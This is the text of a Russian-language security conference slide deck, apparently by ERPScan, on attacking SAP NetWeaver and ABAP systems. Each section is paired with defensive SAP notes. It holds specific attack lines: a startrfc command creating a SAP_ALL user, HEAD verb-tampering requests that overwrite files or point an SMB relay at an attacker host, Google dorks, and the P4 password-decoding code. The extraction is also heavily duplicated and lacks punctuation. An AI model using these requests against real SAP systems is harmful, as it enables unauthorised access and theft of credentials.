bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Как защищаемся
erpscancom 14ERPScan mdash Leading SAP AG partner in discovering and solving security vulnerabilities
Бизнес-логикаНеобходимо защитить доступ между пользователямиРешение Программы класса GRCУровень осведомлённости о проблеме - Высокий
Безопасность платформыНеобходимо защитить систему от неавторизированного доступа из внеРешение СканированиеМониторингТестирование на проникновениеУровень осведомлённости о проблеме - Низкий
Безопасность кодаЗащита от умышленных и неумышленных ошибок разработчиковРешение программный или ручной аудит кода Уровень осведомлённости о проблеме - Низкий
Что происходит сейчас
Ок вы потратили XXX млн $ на лицензию SAP GRC + XXXX млн $ на консультантов оптимизацию SOD и привели красивый отчёт для руководства что за 1 год количество конфликтов уменьшилось с 2389123 до ~10000 И в следующем году планируется уменьшить до 1000
А как обстоят дела с настройками безопасности платформы
erpscanru 15ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как проконтролировать безопасность столь сложной системы
erpscanru 16ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
1001 Способ обойти SOD
bull Не диалоговые пользователиbull Прямой доступ к таблицамbull Безопасность сервисов типа Gateway и Massage Server и прочих bull Хитрые настройки bull Доступ из интернет bull Уязвимости
erpscanru 17ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Не диалоговые пользователи
Есть множество RFC функций для создания пользователя
Пример1 SUSR_RFC_USER_INTERFACEstartrfc -3 -h 17216063 -s 01 -c 001 -u SAPCPIC -p admin ndashF SUSR_RFC_USER_INTERFACE -E USER=TEST -E ACTIVITY=01 -E PASSWORD=123 -E USER_TYPE=A -T USER_PROFILES12r=SAP_ALL
Пример2 BAPI_USER_CREATE1erpscanru 18ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Миф Пользователи SAPCPIC и TMSADM не диалоговые и не имеют доступ к бизнес-информации
Атаки на Gateway и Message Server
bull Атаки описаны в руководстве по безопасности SAP
bull Позволяют ndash неавторизированно зарегистрировать ложный сервер приложений
ndash вызвать зарегистрированный RFC сервис типа SAPXPG
ndash зарегистрировать свой RFC сервис
bull Есть настройки позволяющие
элементарно закрыть уязвимости
erpscanru 19ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Если это так просто и очевидно почему в 90 аудитов настроено не безопасно
Хитрые настройки
Администратор выставил следующие настройки
loginmin_password_uppercase = 2
loginmin_password_lng = 8
loginmin_password_specials = 2
loginpassword_compliance_to_current_policy = 0
loginpassword_max_idle_productive =90
loginpassword_max_idle_initial = 90
В чём проблема
erpscanru 20ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Прямой доступ к таблицам
bull Чтение таблиц
ndash через транзакции SE16 SM31 SM30 SA38 SE38
ndash через RFC вызовы RFC_READ_TABLE
bull Критичные таблицы
USR02 mdash хеши паролей
SSF_PSE_D mdash ключи для SSO доступа
RFCDES ndash пароли в открытом и зашифрованном виде
ICFSERVLOC - пароли для ICF сервисов в открытом виде
и ещё немного пока под секретом
erpscanru 21ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Доступ из интернет + уязвимости
erpscancom 22ERPScan mdash invest in security to secure investments
Атаки на ICM (ABAP)
Более 1500 сервисов с критичным функционалом
1) По умолчанию разрешён доступ любым пользователем
2) Для доступа к sapbcsoaprfc не проверяется авторизация S_RFC
3) Используя пароли по умолчанию типа TMSADMPASSWORD
erpscanru 23ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как итог - полный контроль системы злоумышленником
Прочие небезопасные сервисы
bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных
инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB
erpscanru 24ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Нами изучено более 50 небезопасных сервисов
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Что происходит сейчас
Ок вы потратили XXX млн $ на лицензию SAP GRC + XXXX млн $ на консультантов оптимизацию SOD и привели красивый отчёт для руководства что за 1 год количество конфликтов уменьшилось с 2389123 до ~10000 И в следующем году планируется уменьшить до 1000
А как обстоят дела с настройками безопасности платформы
erpscanru 15ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как проконтролировать безопасность столь сложной системы
erpscanru 16ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
1001 Способ обойти SOD
bull Не диалоговые пользователиbull Прямой доступ к таблицамbull Безопасность сервисов типа Gateway и Massage Server и прочих bull Хитрые настройки bull Доступ из интернет bull Уязвимости
erpscanru 17ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Не диалоговые пользователи
Есть множество RFC функций для создания пользователя
Пример1 SUSR_RFC_USER_INTERFACEstartrfc -3 -h 17216063 -s 01 -c 001 -u SAPCPIC -p admin ndashF SUSR_RFC_USER_INTERFACE -E USER=TEST -E ACTIVITY=01 -E PASSWORD=123 -E USER_TYPE=A -T USER_PROFILES12r=SAP_ALL
Пример2 BAPI_USER_CREATE1erpscanru 18ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Миф Пользователи SAPCPIC и TMSADM не диалоговые и не имеют доступ к бизнес-информации
Атаки на Gateway и Message Server
bull Атаки описаны в руководстве по безопасности SAP
bull Позволяют ndash неавторизированно зарегистрировать ложный сервер приложений
ndash вызвать зарегистрированный RFC сервис типа SAPXPG
ndash зарегистрировать свой RFC сервис
bull Есть настройки позволяющие
элементарно закрыть уязвимости
erpscanru 19ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Если это так просто и очевидно почему в 90 аудитов настроено не безопасно
Хитрые настройки
Администратор выставил следующие настройки
loginmin_password_uppercase = 2
loginmin_password_lng = 8
loginmin_password_specials = 2
loginpassword_compliance_to_current_policy = 0
loginpassword_max_idle_productive =90
loginpassword_max_idle_initial = 90
В чём проблема
erpscanru 20ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Прямой доступ к таблицам
bull Чтение таблиц
ndash через транзакции SE16 SM31 SM30 SA38 SE38
ndash через RFC вызовы RFC_READ_TABLE
bull Критичные таблицы
USR02 mdash хеши паролей
SSF_PSE_D mdash ключи для SSO доступа
RFCDES ndash пароли в открытом и зашифрованном виде
ICFSERVLOC - пароли для ICF сервисов в открытом виде
и ещё немного пока под секретом
erpscanru 21ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Доступ из интернет + уязвимости
erpscancom 22ERPScan mdash invest in security to secure investments
Атаки на ICM (ABAP)
Более 1500 сервисов с критичным функционалом
1) По умолчанию разрешён доступ любым пользователем
2) Для доступа к sapbcsoaprfc не проверяется авторизация S_RFC
3) Используя пароли по умолчанию типа TMSADMPASSWORD
erpscanru 23ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как итог - полный контроль системы злоумышленником
Прочие небезопасные сервисы
bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных
инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB
erpscanru 24ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Нами изучено более 50 небезопасных сервисов
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
